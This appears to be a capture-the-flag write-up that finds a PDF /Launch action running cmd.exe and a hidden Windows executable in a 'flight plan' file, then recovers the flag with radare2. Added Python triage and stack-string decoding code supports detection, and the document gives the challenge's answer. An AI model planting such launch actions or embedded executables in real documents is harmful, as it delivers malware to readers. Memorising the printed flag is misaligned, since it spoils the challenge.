Flight Plan (Smart Airspace, 300p)

After everything is cleared you start to wonder about the origin of this attack.
When inspecting the logs, a correlation between the start of the compromise and a pdf file arriving to the ATC can be made.
Inspect the flight plan, find out if there is anything malicious hidden in it.
Flag format: uuid v4

Solution

Running binwalk and extracting the embedded files.

# binwalk -e flight-plan.pdf

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PDF document, version: "1.4"
318           0x13E           Unix path: /PDF/ImageC/ImageI/ImageB/Text]/Font<</F0 8 0 R/TT0 9 0 R/TT1 10 0 R/TT2 11 0 R>>/ExtGState<</GS0 12 0 R>>/Properties<</MC0 13 0
683           0x2AB           Zlib compressed data, default compression
5420          0x152C          Zlib compressed data, default compression
6364          0x18DC          Unix path: /Type/Font/Subtype/Type1/BaseFont/Courier-Bold/Encoding/WinAnsiEncoding>>
6552          0x1998          Unix path: /Subtype/TrueType/Type/Font/Widths[278 0 0 0 0 0 0 0 333 333 0 0 0 333 278 278 556 556 556 556 0 556 556 556 556 556 0 0 0 0 0 0
6990          0x1B4E          Unix path: /Subtype/TrueType/Type/Font/Widths[278 0 0 0 0 0 0 0 333 333 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 722 0 722 722 667 611
7372          0x1CCC          Unix path: /Subtype/TrueType/Type/Font/Widths[278 0 0 0 0 0 0 0 0 0 0 0 0 333 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 722 722 722 0 0 0 0 0
7694          0x1E0E          Unix path: /SMask/None/Type/ExtGState/ca 1.0/op false>>
170078        0x2985E         Unix path: /Encoding/Identity-H/Subtype/Type0/ToUnicode 50 0 R/Type/Font>>
170663        0x29AA7         Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#">
170873        0x29B79         Unix path: /purl.org/dc/elements/1.1/"
170932        0x29BB4         Unix path: /ns.adobe.com/xap/1.0/mm/">>
179687        0x2BDE7         Unix path: /Subtype/CIDFontType0/Type/Font/W[0 381 600]>>
183223        0x2CBB7         Unix path: /Subtype/CIDFontType0/Type/Font/W[0 381 600]>>
185410        0x2D442         Unix path: /SMask/None/Type/ExtGState/ca 1.0/op false>>
186066        0x2D6D2         Copyright string: "copyright/ordfeminine 172/logicalnot/.notdef/registered/macron/degree/plusminus/twosuperior/threesuperior/acute/mu 183/periodcen"
187942        0x2DE26         Zlib compressed data, best compression
232099        0x38AA3         Unix path: /S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\windows\\system32)/P(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\ATS flight

Searching the extracted files for the flag turns up a Windows executable.

 % strings _flight-plan.pdf.extracted/* | grep flag
hX   ha394hcf15h8adehb84-h8c-ah2-42h-888h25f2h3a44h is hflag1
# grep -H flag _flight-plan.pdf.extracted/*
Binary file _flight-plan.pdf.extracted/2DE26 matches
ar@de02:~/ctf/cybershock22/smart-airspace.flight-plan.300pts % file _flight-plan.pdf.extracted/2DE26
_flight-plan.pdf.extracted/2DE26: PE32 executable (GUI) Intel 80386, for MS Windows
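The two things binwalk surfaced here, a /Launch action that starts cmd.exe and a PE file sitting inside a Flate (zlib) stream, are exactly what a defender would want to flag automatically when a PDF arrives at a control room. The script below is an added example (not part of the original write-up or the tools it uses) that does that triage: it walks the PDF's literal-string syntax to pull the program and parameters out of every /Launch action, and inflates every stream to see whether an MZ/PE header is hiding in it. It runs on a small PDF-like byte string constructed inline for the demonstration; the real flight-plan.pdf is not included, and the object layout of the sample is an assumption.

```python
import re
import zlib
from typing import Optional

# --- constructed sample input (NOT the flight-plan.pdf from the write-up) ---
# A fake PE image: 'MZ', padding, e_lfanew at 0x3C pointing to a 'PE\0\0' header.
_FAKE_PE = b"MZ" + b"\x90" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 200
_STREAM = zlib.compress(_FAKE_PE)
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 3 0 R>>endobj\n"
    b"3 0 obj<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C echo hi)>>>>endobj\n"
    b"4 0 obj<</Length " + str(len(_STREAM)).encode() + b"/Filter/FlateDecode>>stream\n"
    + _STREAM + b"\nendstream\nendobj\n"
    b"%%EOF\n"
)

_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t"}


def _read_literal_string(data: bytes, start: int) -> bytes:
    """Read a PDF literal string whose '(' is at data[start].

    PDF strings may contain balanced, unescaped parentheses (the real sample's
    /P parameter does), so a naive '[^)]*' regex would truncate them; this
    tracks nesting depth and resolves backslash escapes.
    """
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            nxt = data[i + 1:i + 2]
            out += _ESCAPES.get(nxt, nxt)
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth == 1:          # opening paren of the string itself
                i += 1
                continue
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
        out += c
        i += 1
    return bytes(out)


def _dict_string(window: bytes, key: bytes) -> Optional[str]:
    """Return the literal-string value of `key` (e.g. b'/F') inside one object."""
    k = re.search(re.escape(key) + rb"\s*\(", window)
    if not k:
        return None
    return _read_literal_string(window, k.end() - 1).decode("latin-1")


def find_launch_actions(pdf: bytes) -> list:
    """Locate every /S /Launch action and report the program (/F) and params (/P)."""
    hits = []
    for m in re.finditer(rb"/S\s*/Launch", pdf):
        end = pdf.find(b"endobj", m.start())
        window = pdf[m.start(): end if end != -1 else m.start() + 1024]
        hits.append({"offset": m.start(),
                     "program": _dict_string(window, b"/F"),
                     "params": _dict_string(window, b"/P")})
    return hits


def find_embedded_executables(pdf: bytes) -> list:
    """Inflate each stream body and report those that carry an MZ/PE header."""
    found = []
    for m in re.finditer(rb"(?<!end)stream\r?\n", pdf):
        start = m.end()
        end = pdf.find(b"endstream", start)
        if end == -1:
            continue
        try:
            data = zlib.decompress(pdf[start:end].rstrip(b"\r\n"))
        except zlib.error:
            continue                     # not a zlib stream (image data, fonts, ...)
        if data[:2] == b"MZ":
            pe_off = int.from_bytes(data[0x3C:0x40], "little")
            found.append({"stream_offset": start, "size": len(data),
                          "pe_header": data[pe_off:pe_off + 4] == b"PE\x00\x00"})
    return found


def triage(pdf: bytes) -> dict:
    """Summarise both indicators; either one alone is enough to quarantine the file."""
    launches = find_launch_actions(pdf)
    exes = find_embedded_executables(pdf)
    return {"launch_actions": launches, "embedded_executables": exes,
            "suspicious": bool(launches or exes)}


if __name__ == "__main__":
    print(triage(SAMPLE_PDF))
```

Run it against a real file with `triage(open("suspect.pdf", "rb").read())`. Only FlateDecode streams are inflated here; a PDF can also wrap payloads in other filters (ASCIIHex, LZW, ...) or embed them via /EmbeddedFile objects, so a production check should decode those as well.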

Investigating the executable further leads to the flag.

% r2 -A _flight-plan.pdf.extracted/2DE26
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
 -- Use rabin2 to discover the real TRUTH
[0x00406621]> izz~flag
363  0x000084cd 0x004084cd 65  67   .text   utf8    hX   ha394hcf15h8adehb84-h8c-ah2-42h-888h25f2h3a44h is hflag1ɈL$, blocks=Basic Latin,Latin Extended-B
[0x00406621]> pd 16@0x004084cd
            0x004084cd      6858202020     push 0x20202058             ; 'X   '
            0x004084d2      6861333934     push 0x34393361             ; 'a394'
            0x004084d7      6863663135     push 0x35316663             ; 'cf15'
            0x004084dc      6838616465     push 0x65646138             ; '8ade'
            0x004084e1      686238342d     push 0x2d343862             ; 'b84-'
            0x004084e6      6838632d61     push 0x612d6338             ; '8c-a'
            0x004084eb      68322d3432     push 0x32342d32             ; '2-42'
            0x004084f0      682d383838     push 0x3838382d             ; '-888'
            0x004084f5      6832356632     push 0x32663532             ; '25f2'
            0x004084fa      6833613434     push 0x34346133             ; '3a44'
            0x004084ff      6820697320     push 0x20736920             ; ' is '
            0x00408504      68666c6167     push 0x67616c66             ; 'flag'
            0x00408509      31c9           xor ecx, ecx
            0x0040850b      884c242c       mov byte [esp + 0x2c], cl
            0x0040850f      89e1           mov ecx, esp
            0x00408511      31d2           xor edx, edx

Read the flag from bottom to top: each push stores its four characters little-endian at a lower address than the previous one, so the last push ('flag') ends up at the start of the string and the first push ('X   ') at the end, where the mov byte [esp + 0x2c], cl with ecx zeroed overwrites it with the NUL terminator.

Flag is 3a4425f2-8882-428c-ab84-8adecf15a394.
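The bottom-to-top reading is a standard stack-string recovery and can be automated. The Python below is an added example, not part of the original write-up, that takes the radare2 listing above (pasted inline as constructed input), orders the push immediates the way they land on the stack, cuts the buffer at the offset where the NUL byte is written, and checks the result against the uuid v4 format the challenge asks for.

```python
import re
from typing import Optional

# The disassembly from the write-up, reproduced as constructed input.
DISASM = """\
            0x004084cd      6858202020     push 0x20202058             ; 'X   '
            0x004084d2      6861333934     push 0x34393361             ; 'a394'
            0x004084d7      6863663135     push 0x35316663             ; 'cf15'
            0x004084dc      6838616465     push 0x65646138             ; '8ade'
            0x004084e1      686238342d     push 0x2d343862             ; 'b84-'
            0x004084e6      6838632d61     push 0x612d6338             ; '8c-a'
            0x004084eb      68322d3432     push 0x32342d32             ; '2-42'
            0x004084f0      682d383838     push 0x3838382d             ; '-888'
            0x004084f5      6832356632     push 0x32663532             ; '25f2'
            0x004084fa      6833613434     push 0x34346133             ; '3a44'
            0x004084ff      6820697320     push 0x20736920             ; ' is '
            0x00408504      68666c6167     push 0x67616c66             ; 'flag'
            0x00408509      31c9           xor ecx, ecx
            0x0040850b      884c242c       mov byte [esp + 0x2c], cl
            0x0040850f      89e1           mov ecx, esp
            0x00408511      31d2           xor edx, edx
"""

# address, raw bytes, 'push imm32' -> capture the immediate
PUSH_RE = re.compile(r"^\s*0x[0-9a-f]+\s+[0-9a-f]+\s+push\s+(0x[0-9a-f]+)", re.M)
# the NUL terminator store: 'mov byte [esp + 0xNN], cl' after 'xor ecx, ecx'
TERM_RE = re.compile(r"mov byte \[esp \+ (0x[0-9a-f]+)\], cl")
# uuid v4: version nibble 4, variant nibble 8-b
UUID4_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}")


def find_terminator_offset(disasm: str) -> Optional[int]:
    """Offset from esp at which the code writes the zero byte, if present."""
    m = TERM_RE.search(disasm)
    return int(m.group(1), 16) if m else None


def recover_stack_string(disasm: str) -> bytes:
    """Rebuild the string assembled by a run of 'push imm32' instructions.

    The stack grows downward, so the LAST push sits at the lowest address
    (esp) and is read first; each immediate is stored little-endian, so
    0x67616c66 becomes the bytes 66 6c 61 67 = 'flag'.
    """
    imms = [int(m.group(1), 16) for m in PUSH_RE.finditer(disasm)]
    buf = b"".join(v.to_bytes(4, "little") for v in reversed(imms))
    term = find_terminator_offset(disasm)
    if term is not None and term < len(buf):
        buf = buf[:term]          # everything past the NUL is never printed
    return buf


def extract_flag(disasm: str) -> Optional[str]:
    """Decode the recovered string and return the uuid v4 it contains, if any."""
    text = recover_stack_string(disasm).decode("ascii", errors="replace")
    m = UUID4_RE.search(text)
    return m.group(0) if m else None


if __name__ == "__main__":
    print(recover_stack_string(DISASM).decode())
    print("flag:", extract_flag(DISASM))
```

Without the terminator cut the buffer would end in the 'X   ' filler bytes from the first push; the version and variant checks in the regex are a cheap way to confirm the decode is byte-exact rather than merely plausible.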
